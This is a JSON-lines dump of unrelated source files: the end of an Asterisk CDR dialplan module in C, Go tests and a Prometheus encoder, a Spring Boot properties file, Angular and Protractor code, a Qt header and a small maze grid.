channel.\n\t\t\t\t\t\tWrite-Only\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\tThis function sets a property on a channel's CDR. Properties\n\t\t\talter the behavior of how the CDR operates for that channel.\n\t\t\n\t\n ***/\n\nenum cdr_option_flags {\n\tOPT_UNPARSED = (1 << 1),\n\tOPT_FLOAT = (1 << 2),\n};\n\nAST_APP_OPTIONS(cdr_func_options, {\n\tAST_APP_OPTION('f', OPT_FLOAT),\n\tAST_APP_OPTION('u', OPT_UNPARSED),\n});\n\nstruct cdr_func_payload {\n\tstruct ast_channel *chan;\n\tconst char *cmd;\n\tconst char *arguments;\n\tconst char *value;\n\tvoid *data;\n};\n\nstruct cdr_func_data {\n\tchar *buf;\n\tsize_t len;\n};\n\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_read_message_type);\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_write_message_type);\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_prop_write_message_type);\n\nstatic struct timeval cdr_retrieve_time(struct ast_channel *chan, const char *time_name)\n{\n\tstruct timeval time = { 0 };\n\tchar *value = NULL;\n\tchar tempbuf[128];\n\tlong int tv_sec;\n\tlong int tv_usec;\n\n\tif (ast_strlen_zero(ast_channel_name(chan))) {\n\t\t/* Format request on a dummy channel */\n\t\tast_cdr_format_var(ast_channel_cdr(chan), time_name, &value, tempbuf, sizeof(tempbuf), 1);\n\t} else {\n\t\tast_cdr_getvar(ast_channel_name(chan), time_name, tempbuf, sizeof(tempbuf));\n\t}\n\n\t/* time.tv_usec is suseconds_t, which could be int or long */\n\tif (sscanf(tempbuf, \"%ld.%ld\", &tv_sec, &tv_usec) == 2) {\n\t\ttime.tv_sec = tv_sec;\n\t\ttime.tv_usec = tv_usec;\n\t} else {\n\t\tast_log(AST_LOG_WARNING, \"Failed to fully extract '%s' from CDR\\n\", time_name);\n\t}\n\n\treturn time;\n}\n\nstatic void cdr_read_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload = stasis_message_data(message);\n\tstruct cdr_func_data *output;\n\tchar *info;\n\tchar *value = NULL;\n\tstruct ast_flags flags = { 0 };\n\tchar tempbuf[512];\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\n\tif (cdr_read_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\n\tast_assert(payload != NULL);\n\toutput = payload->data;\n\tast_assert(output != NULL);\n\n\tif (ast_strlen_zero(payload->arguments)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a variable (%s(variable[,option]))\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tinfo = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, info);\n\n\tif (!ast_strlen_zero(args.options)) {\n\t\tast_app_parse_options(cdr_func_options, &flags, NULL, args.options);\n\t}\n\n\tif (ast_strlen_zero(ast_channel_name(payload->chan))) {\n\t\t/* Format request on a dummy channel */\n\t\tast_cdr_format_var(ast_channel_cdr(payload->chan), args.variable, &value, tempbuf, sizeof(tempbuf), ast_test_flag(&flags, OPT_UNPARSED));\n\t\tif (ast_strlen_zero(value)) {\n\t\t\treturn;\n\t\t}\n\t\tast_copy_string(tempbuf, value, sizeof(tempbuf));\n\t\tast_set_flag(&flags, OPT_UNPARSED);\n\t} else if (ast_cdr_getvar(ast_channel_name(payload->chan), args.variable, tempbuf, sizeof(tempbuf))) {\n\t\treturn;\n\t}\n\n\tif (ast_test_flag(&flags, OPT_FLOAT)\n\t\t&& (!strcasecmp(\"billsec\", args.variable) || !strcasecmp(\"duration\", args.variable))) {\n\t\tstruct timeval start = cdr_retrieve_time(payload->chan, !strcasecmp(\"billsec\", args.variable) ? \"answer\" : \"start\");\n\t\tstruct timeval finish = cdr_retrieve_time(payload->chan, \"end\");\n\t\tdouble delta;\n\n\t\tif (ast_tvzero(finish)) {\n\t\t\tfinish = ast_tvnow();\n\t\t}\n\n\t\tif (ast_tvzero(start)) {\n\t\t\tdelta = 0.0;\n\t\t} else {\n\t\t\tdelta = (double)(ast_tvdiff_us(finish, start) / 1000000.0);\n\t\t}\n\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%lf\", delta);\n\n\t} else if (!ast_test_flag(&flags, OPT_UNPARSED)) {\n\t\tif (!strcasecmp(\"start\", args.variable)\n\t\t\t|| !strcasecmp(\"end\", args.variable)\n\t\t\t|| !strcasecmp(\"answer\", args.variable)) {\n\t\t\tstruct timeval fmt_time;\n\t\t\tstruct ast_tm tm;\n\t\t\t/* tv_usec is suseconds_t, which could be int or long */\n\t\t\tlong int tv_sec;\n\t\t\tlong int tv_usec;\n\n\t\t\tif (sscanf(tempbuf, \"%ld.%ld\", &tv_sec, &tv_usec) != 2) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tif (tv_sec) {\n\t\t\t\tfmt_time.tv_sec = tv_sec;\n\t\t\t\tfmt_time.tv_usec = tv_usec;\n\t\t\t\tast_localtime(&fmt_time, &tm, NULL);\n\t\t\t\tast_strftime(tempbuf, sizeof(tempbuf), \"%Y-%m-%d %T\", &tm);\n\t\t\t} else {\n\t\t\t\ttempbuf[0] = '\\0';\n\t\t\t}\n\t\t} else if (!strcasecmp(\"disposition\", args.variable)) {\n\t\t\tint disposition;\n\n\t\t\tif (sscanf(tempbuf, \"%8d\", &disposition) != 1) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%s\", ast_cdr_disp2str(disposition));\n\t\t} else if (!strcasecmp(\"amaflags\", args.variable)) {\n\t\t\tint amaflags;\n\n\t\t\tif (sscanf(tempbuf, \"%8d\", &amaflags) != 1) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%s\", ast_channel_amaflags2string(amaflags));\n\t\t}\n\t}\n\n\tast_copy_string(output->buf, tempbuf, output->len);\n}\n\nstatic void cdr_write_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload;\n\tstruct ast_flags flags = { 0 };\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\tchar *parse;\n\n\tif (cdr_write_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\tpayload = stasis_message_data(message);\n\tif (!payload) {\n\t\treturn;\n\t}\n\tif (ast_strlen_zero(payload->arguments)\n\t\t|| !payload->value) {\n\t\t/* Sanity check. cdr_write() could never send these bad messages */\n\t\tast_assert(0);\n\t\treturn;\n\t}\n\n\tparse = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\tif (!ast_strlen_zero(args.options)) {\n\t\tast_app_parse_options(cdr_func_options, &flags, NULL, args.options);\n\t}\n\n\t/* These are already handled by cdr_write() */\n\tast_assert(strcasecmp(args.variable, \"accountcode\")\n\t\t&& strcasecmp(args.variable, \"peeraccount\")\n\t\t&& strcasecmp(args.variable, \"amaflags\"));\n\n\tif (!strcasecmp(args.variable, \"userfield\")) {\n\t\tast_cdr_setuserfield(ast_channel_name(payload->chan), payload->value);\n\t} else {\n\t\tast_cdr_setvar(ast_channel_name(payload->chan), args.variable, payload->value);\n\t}\n}\n\nstatic void cdr_prop_write_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload = stasis_message_data(message);\n\tenum ast_cdr_options option;\n\tchar *parse;\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\n\tif (cdr_prop_write_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\n\tif (!payload) {\n\t\treturn;\n\t}\n\n\tif (ast_strlen_zero(payload->arguments)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a variable (%s(variable)=value)\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tif (ast_strlen_zero(payload->value)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a value (%s(variable)=value)\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tparse = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\tif (!strcasecmp(\"party_a\", args.variable)) {\n\t\toption = AST_CDR_FLAG_PARTY_A;\n\t} else if (!strcasecmp(\"disable\", args.variable)) {\n\t\toption = AST_CDR_FLAG_DISABLE_ALL;\n\t} else {\n\t\tast_log(AST_LOG_WARNING, \"Unknown option %s used with %s\\n\", args.variable, payload->cmd);\n\t\treturn;\n\t}\n\n\tif (ast_true(payload->value)) {\n\t\tast_cdr_set_property(ast_channel_name(payload->chan), option);\n\t} else {\n\t\tast_cdr_clear_property(ast_channel_name(payload->chan), option);\n\t}\n}\n\n\nstatic int cdr_read(struct ast_channel *chan, const char *cmd, char *parse,\n\t\t char *buf, size_t len)\n{\n\tRAII_VAR(struct stasis_message *, message, NULL, ao2_cleanup);\n\tRAII_VAR(struct cdr_func_payload *, payload, NULL, ao2_cleanup);\n\tstruct cdr_func_data output = { 0, };\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\n\tif (!cdr_read_message_type()) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = parse;\n\tpayload->data = &output;\n\n\tbuf[0] = '\\0';/* Ensure the buffer is initialized. */\n\toutput.buf = buf;\n\toutput.len = len;\n\n\tmessage = stasis_message_create(cdr_read_message_type(), payload);\n\tif (!message) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\t/* If this is a request on a dummy channel, we're doing post-processing on an\n\t * already dispatched CDR. Simply call the callback to calculate the value and\n\t * return, instead of posting to Stasis as we would for a running channel.\n\t */\n\tif (ast_strlen_zero(ast_channel_name(chan))) {\n\t\tcdr_read_callback(NULL, NULL, message);\n\t} else {\n\t\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\n\t\tif (!router) {\n\t\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\t\tast_channel_name(chan));\n\t\t\treturn -1;\n\t\t}\n\t\tstasis_message_router_publish_sync(router, message);\n\t}\n\n\treturn 0;\n}\n\nstatic int cdr_write(struct ast_channel *chan, const char *cmd, char *arguments,\n\tconst char *value)\n{\n\tstruct stasis_message *message;\n\tstruct cdr_func_payload *payload;\n\tstruct stasis_message_router *router;\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\tchar *parse;\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\tif (ast_strlen_zero(arguments)) {\n\t\tast_log(LOG_WARNING, \"%s requires a variable (%s(variable)=value)\\n)\",\n\t\t\tcmd, cmd);\n\t\treturn -1;\n\t}\n\tif (!value) {\n\t\tast_log(LOG_WARNING, \"%s requires a value (%s(variable)=value)\\n)\",\n\t\t\tcmd, cmd);\n\t\treturn -1;\n\t}\n\n\tparse = ast_strdupa(arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\t/* These CDR variables are no longer supported or set directly on the channel */\n\tif (!strcasecmp(args.variable, \"accountcode\")) {\n\t\tast_log(LOG_WARNING, \"Using the %s function to set 'accountcode' is deprecated. Please use the CHANNEL function instead.\\n\",\n\t\t\tcmd);\n\t\tast_channel_lock(chan);\n\t\tast_channel_accountcode_set(chan, value);\n\t\tast_channel_unlock(chan);\n\t\treturn 0;\n\t}\n\tif (!strcasecmp(args.variable, \"amaflags\")) {\n\t\tint amaflags;\n\n\t\tast_log(LOG_WARNING, \"Using the %s function to set 'amaflags' is deprecated. Please use the CHANNEL function instead.\\n\",\n\t\t\tcmd);\n\t\tif (isdigit(*value)) {\n\t\t\tif (sscanf(value, \"%30d\", &amaflags) != 1) {\n\t\t\t\tamaflags = AST_AMA_NONE;\n\t\t\t}\n\t\t} else {\n\t\t\tamaflags = ast_channel_string2amaflag(value);\n\t\t}\n\t\tast_channel_lock(chan);\n\t\tast_channel_amaflags_set(chan, amaflags);\n\t\tast_channel_unlock(chan);\n\t\treturn 0;\n\t}\n\tif (!strcasecmp(args.variable, \"peeraccount\")) {\n\t\tast_log(LOG_WARNING, \"The 'peeraccount' setting is not supported. Please set the 'accountcode' on the appropriate channel using the CHANNEL function.\\n\");\n\t\treturn 0;\n\t}\n\n\t/* The remaining CDR variables are handled by CDR processing code */\n\tif (!cdr_write_message_type()) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = arguments;\n\tpayload->value = value;\n\n\tmessage = stasis_message_create(cdr_write_message_type(), payload);\n\tao2_ref(payload, -1);\n\tif (!message) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\trouter = ast_cdr_message_router();\n\tif (!router) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\tast_channel_name(chan));\n\t\tao2_ref(message, -1);\n\t\treturn -1;\n\t}\n\tstasis_message_router_publish_sync(router, message);\n\tao2_ref(router, -1);\n\tao2_ref(message, -1);\n\n\treturn 0;\n}\n\nstatic int cdr_prop_write(struct ast_channel *chan, const char *cmd, char *parse,\n\t\t const char *value)\n{\n\tRAII_VAR(struct stasis_message *, message, NULL, ao2_cleanup);\n\tRAII_VAR(struct cdr_func_payload *, payload, NULL, ao2_cleanup);\n\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\n\tif (!router) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tif (!cdr_prop_write_message_type()) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = parse;\n\tpayload->value = value;\n\n\tmessage = stasis_message_create(cdr_prop_write_message_type(), payload);\n\tif (!message) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\tstasis_message_router_publish_sync(router, message);\n\n\treturn 0;\n}\n\nstatic struct ast_custom_function cdr_function = {\n\t.name = \"CDR\",\n\t.read = cdr_read,\n\t.write = cdr_write,\n};\n\nstatic struct ast_custom_function cdr_prop_function = {\n\t.name = \"CDR_PROP\",\n\t.read = NULL,\n\t.write = cdr_prop_write,\n};\n\nstatic int unload_module(void)\n{\n\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\tint res = 0;\n\n\tif (router) {\n\t\tstasis_message_router_remove(router, cdr_prop_write_message_type());\n\t\tstasis_message_router_remove(router, cdr_write_message_type());\n\t\tstasis_message_router_remove(router, cdr_read_message_type());\n\t}\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_read_message_type);\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_write_message_type);\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_prop_write_message_type);\n\tres |= ast_custom_function_unregister(&cdr_function);\n\tres |= ast_custom_function_unregister(&cdr_prop_function);\n\n\treturn res;\n}\n\nstatic int load_module(void)\n{\n\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\tint res = 0;\n\n\tif (!router) {\n\t\treturn AST_MODULE_LOAD_DECLINE;\n\t}\n\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_read_message_type);\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_write_message_type);\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_prop_write_message_type);\n\tres |= ast_custom_function_register(&cdr_function);\n\tres |= ast_custom_function_register(&cdr_prop_function);\n\tres |= stasis_message_router_add(router, cdr_prop_write_message_type(),\n\t cdr_prop_write_callback, NULL);\n\tres |= stasis_message_router_add(router, cdr_write_message_type(),\n\t cdr_write_callback, NULL);\n\tres |= stasis_message_router_add(router, cdr_read_message_type(),\n\t cdr_read_callback, NULL);\n\n\tif (res) {\n\t\tunload_module();\n\t\treturn AST_MODULE_LOAD_DECLINE;\n\t}\n\treturn AST_MODULE_LOAD_SUCCESS;\n}\n\nAST_MODULE_INFO(ASTERISK_GPL_KEY, AST_MODFLAG_DEFAULT, \"Call Detail Record (CDR) dialplan functions\",\n\t.support_level = AST_MODULE_SUPPORT_CORE,\n\t.load = load_module,\n\t.unload = unload_module,\n\t.requires = \"cdr\",\n);\n"} {"text": "package tealogs\n\nimport (\n\t\"github.com/TeaWeb/code/tealogs/accesslogs\"\n\t\"github.com/TeaWeb/code/teatesting\"\n\t\"testing\"\n\t\"time\"\n)\n\nfunc TestMySQLStorage_Write(t *testing.T) {\n\tif !teatesting.RequireMySQL() {\n\t\treturn\n\t}\n\n\tbefore := time.Now()\n\tdefer func() {\n\t\tt.Log(\"cost:\", time.Since(before).Seconds(), \"seconds\")\n\t}()\n\n\tstorage := &MySQLStorage{\n\t\tStorage: Storage{\n\t\t},\n\t\tHost: \"127.0.0.1\",\n\t\tPort: 3306,\n\t\tUsername: \"root\",\n\t\tPassword: \"123456\",\n\t\tDatabase: \"teaweb\",\n\t\tTable: \"accessLogs${date}\",\n\t\tLogField: \"log\",\n\t}\n\n\terr := storage.Start()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t{\n\t\tstorage.Format = StorageFormatJSON\n\t\tstorage.Template = `${timeLocal} \"${requestMethod} ${requestPath}\"`\n\t\terr := storage.Write([]*accesslogs.AccessLog{\n\t\t\t{\n\t\t\t\tRequestMethod: \"POST\",\n\t\t\t\tRequestPath: \"/1\",\n\t\t\t\tTimeLocal: time.Now().Format(\"2/Jan/2006:15:04:05 -0700\"),\n\t\t\t\tHeader: map[string][]string{\n\t\t\t\t\t\"Content-Type\": {\"text/html\"},\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tRequestMethod: \"GET\",\n\t\t\t\tRequestPath: \"/2\",\n\t\t\t\tTimeLocal: time.Now().Format(\"2/Jan/2006:15:04:05 -0700\"),\n\t\t\t\tHeader: map[string][]string{\n\t\t\t\t\t\"Content-Type\": {\"text/css\"},\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\n\terr = storage.Close()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n}\n"} {"text": "Feature: Finding a test file\n\nScenario: Finding a controller test\n Given I open the app file \"app/models/user.rb\"\n And file \"test/controllers/bars_controller_test.rb\" exists\n And I turn on projectile-rails-mode\n When I run command \"projectile-rails-find-test\" selecting \"controllers/bars_controller\"\n Then I am in file \"test/controllers/bars_controller_test.rb\"\n"} {"text": "{\n \"@type\" : \"g:Direction\",\n \"@value\" : \"OUT\"\n}"} {"text": "spring.application.name=zheng\nspring.application.description=hello, ${spring.application.name}!\nserver.port=9090\nserver.context-path=/springboot\nserver.error.path=/error\nserver.session-timeout=60\nserver.tomcat.uri-encoding=UTF-8\n########## 当前环境 ##########\nspring.profiles.active=prod\n########## 单数据源 ##########\n#spring.datasource.url=jdbc:mysql://localhost:3306/zheng\n#spring.datasource.username=root\n#spring.datasource.password=123456\n#spring.datasource.driver-class-name=com.mysql.jdbc.Driver\n########## 多数据源 ##########\nspring.datasource.primary.url=jdbc:mysql://localhost:3306/zheng\nspring.datasource.primary.username=root\nspring.datasource.primary.password=123456\nspring.datasource.primary.driver-class-name=com.mysql.jdbc.Driver\nspring.datasource.secondary.url=jdbc:mysql://localhost:3306/springboot\nspring.datasource.secondary.username=root\nspring.datasource.secondary.password=123456\nspring.datasource.secondary.driver-class-name=com.mysql.jdbc.Driver\n########## jpa ##########\nspring.jpa.properties.hibernate.hbm2ddl.auto=update\n########## 日志 ##########\nspring.output.ansi.enabled=DETECT\nlogging.file=springboot.log\nlogging.level.root=INFO\n########## REDIS (RedisProperties) ##########\n# Redis数据库索引(默认为0)\nspring.redis.database=0\n# Redis服务器地址\nspring.redis.host=redis-11291.c8.us-east-1-4.ec2.cloud.redislabs.com\n# Redis服务器连接端口\nspring.redis.port=11291\n# Redis服务器连接密码(默认为空)\nspring.redis.password=123456\n# 连接池最大连接数(使用负值表示没有限制)\nspring.redis.pool.max-active=8\n# 连接池最大阻塞等待时间(使用负值表示没有限制)\nspring.redis.pool.max-wait=-1\n# 连接池中的最大空闲连接\nspring.redis.pool.max-idle=8\n# 连接池中的最小空闲连接\nspring.redis.pool.min-idle=0\n# 连接超时时间(毫秒)\nspring.redis.timeout=0\n########## JavaMailSender ##########\nspring.mail.host=smtp.163.com\nspring.mail.username=\nspring.mail.password=\nspring.mail.properties.mail.smtp.auth=true\nspring.mail.properties.mail.smtp.starttls.enable=true\nspring.mail.properties.mail.smtp.starttls.required=true\n########## RabbitMQ ##########\nspring.rabbitmq.host=localhost\nspring.rabbitmq.port=5672\nspring.rabbitmq.username=guest\nspring.rabbitmq.password=guest"} {"text": "// Protractor configuration file, see link for more information\n// https://github.com/angular/protractor/blob/master/lib/config.ts\n\nconst { SpecReporter } = require('jasmine-spec-reporter');\n\nexports.config = {\n allScriptsTimeout: 11000,\n specs: [\n './e2e/**/*.e2e-spec.ts'\n ],\n capabilities: {\n 'browserName': 'chrome'\n },\n directConnect: true,\n baseUrl: 'http://localhost:4200/',\n framework: 'jasmine',\n jasmineNodeOpts: {\n showColors: true,\n defaultTimeoutInterval: 30000,\n print: function() {}\n },\n onPrepare() {\n require('ts-node').register({\n project: 'e2e/tsconfig.e2e.json'\n });\n jasmine.getEnv().addReporter(new SpecReporter({ spec: { displayStacktrace: true } }));\n }\n};\n"} {"text": "import { Component, OnInit } from '@angular/core';\nimport { Message } from '../_models/message';\nimport { Pagination } from '../_models/pagination';\nimport { ConfirmService } from '../_services/confirm.service';\nimport { MessageService } from '../_services/message.service';\n\n@Component({\n selector: 'app-messages',\n templateUrl: './messages.component.html',\n styleUrls: ['./messages.component.css']\n})\nexport class MessagesComponent implements OnInit {\n messages: Message[] = [];\n pagination: Pagination;\n container = 'Unread';\n pageNumber = 1;\n pageSize = 5;\n loading = false;\n\n constructor(private messageService: MessageService, private confirmService: ConfirmService) { }\n\n ngOnInit(): void {\n this.loadMessages();\n }\n\n loadMessages() {\n this.loading = true;\n this.messageService.getMessages(this.pageNumber, this.pageSize, this.container).subscribe(response => {\n this.messages = response.result;\n this.pagination = response.pagination;\n this.loading = false;\n })\n }\n\n deleteMessage(id: number) {\n this.confirmService.confirm('Confirm delete message', 'This cannot be undone').subscribe(result => {\n if (result) {\n this.messageService.deleteMessage(id).subscribe(() => {\n this.messages.splice(this.messages.findIndex(m => m.id === id), 1);\n })\n }\n })\n\n }\n\n pageChanged(event: any) {\n this.pageNumber = event.page;\n this.loadMessages();\n }\n\n}\n"} {"text": "/****************************************************************************\n**\n** Copyright (C) 2016 Jochen Becher\n** Contact: https://www.qt.io/licensing/\n**\n** This file is part of Qt Creator.\n**\n** Commercial License Usage\n** Licensees holding valid commercial Qt licenses may use this file in\n** accordance with the commercial license agreement provided with the\n** Software or, alternatively, in accordance with the terms contained in\n** a written agreement between you and The Qt Company. For licensing terms\n** and conditions see https://www.qt.io/terms-conditions. For further\n** information use the contact form at https://www.qt.io/contact-us.\n**\n** GNU General Public License Usage\n** Alternatively, this file may be used under the terms of the GNU\n** General Public License version 3 as published by the Free Software\n** Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT\n** included in the packaging of this file. Please review the following\n** information to ensure the GNU General Public License requirements will\n** be met: https://www.gnu.org/licenses/gpl-3.0.html.\n**\n****************************************************************************/\n\n#pragma once\n\n#include \n#include \n\nQT_BEGIN_NAMESPACE\nclass QPolygonF;\nclass QLineF;\nclass QPointF;\nclass QRectF;\nclass QSizeF;\nQT_END_NAMESPACE\n\nnamespace qmt {\n\nclass GeometryUtilities\n{\n GeometryUtilities() = delete;\n\npublic:\n enum Side {\n SideUnspecified,\n SideTop,\n SideBottom,\n SideLeft,\n SideRight\n };\n\n static QLineF stretch(const QLineF &line, double p1Extension, double p2Extension);\n static bool intersect(const QPolygonF &polygon, const QLineF &line,\n QPointF *intersectionPoint = nullptr, QLineF *intersectionLine = nullptr,\n int nearestPoint = 1);\n static bool intersect(const QList &polygons, const QLineF &line,\n int *intersectionPolygon, QPointF *intersectionPoint = nullptr, QLineF *intersectionLine = nullptr,\n int nearestPoint = 1);\n static bool placeRectAtLine(const QRectF &rect, const QLineF &line, double lineOffset,\n double distance, const QLineF &intersectionLine, QPointF *placement,\n Side *horizontalAlignedSide);\n static double calcAngle(const QLineF &line);\n static double calcDistancePointToLine(const QPointF &point, const QLineF &line);\n static QPointF calcProjection(const QLineF &line, const QPointF &point);\n static QPointF calcPrimaryAxisDirection(const QLineF &line);\n static QPointF calcSecondaryAxisDirection(const QLineF &line);\n static void adjustPosAndRect(QPointF *pos, QRectF *rect, const QPointF &topLeftDelta,\n const QPointF &bottomRightDelta, const QPointF &relativeAlignment);\n static QSizeF ensureMinimumRasterSize(const QSizeF &size, double rasterWidth,\n double rasterHeight);\n};\n\n} // namespace qmt\n"} {"text": "################\n#0#.....#......9\n#.#.#####.######\n#.......#.#.#..6\n#.#####.#.#.#.##\n#3#5#...........\n###.###.#######.\n#...#8..#...#1..\n#.#####.###.####\n#.......#.#...#.\n#.#.#####.#.###.\n#.#.#.#4#.......\n#.###.#.#.#.####\n#.........#.....\n###.#.#####.#.##\n#7..#.#.....#..2\n"} {"text": "package prometheus\n\nimport (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"math\"\n\t\"strconv\"\n\t\"time\"\n\n\t\"github.com/influxdata/influxdb/v2/models\"\n\tdto \"github.com/prometheus/client_model/go\"\n\t\"github.com/prometheus/common/expfmt\"\n)\n\n// Encoder transforms metric families into bytes.\ntype Encoder interface {\n\t// Encode encodes metrics into bytes.\n\tEncode(mfs []*dto.MetricFamily) ([]byte, error)\n}\n\n// Expfmt encodes metric families into prometheus exposition format.\ntype Expfmt struct {\n\tFormat expfmt.Format\n}\n\n// Encode encodes metrics into prometheus exposition format bytes.\nfunc (e *Expfmt) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeExpfmt(mfs, e.Format)\n}\n\n// DecodeExpfmt decodes the reader of format into metric families.\nfunc DecodeExpfmt(r io.Reader, format expfmt.Format) ([]*dto.MetricFamily, error) {\n\tdec := expfmt.NewDecoder(r, format)\n\tmfs := []*dto.MetricFamily{}\n\tfor {\n\t\tvar mf dto.MetricFamily\n\t\tif err := dec.Decode(&mf); err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\t\tmfs = append(mfs, &mf)\n\t}\n\treturn mfs, nil\n}\n\n// EncodeExpfmt encodes the metrics family (defaults to expfmt.FmtProtoDelim).\nfunc EncodeExpfmt(mfs []*dto.MetricFamily, opts ...expfmt.Format) ([]byte, error) {\n\tformat := expfmt.FmtProtoDelim\n\tif len(opts) != 0 && opts[0] != \"\" {\n\t\tformat = opts[0]\n\t}\n\tbuf := &bytes.Buffer{}\n\tenc := expfmt.NewEncoder(buf, format)\n\tfor _, mf := range mfs {\n\t\tif err := enc.Encode(mf); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn buf.Bytes(), nil\n}\n\n// JSON encodes metric families into JSON.\ntype JSON struct{}\n\n// Encode encodes metrics JSON bytes. This not always works\n// as some prometheus values are NaN or 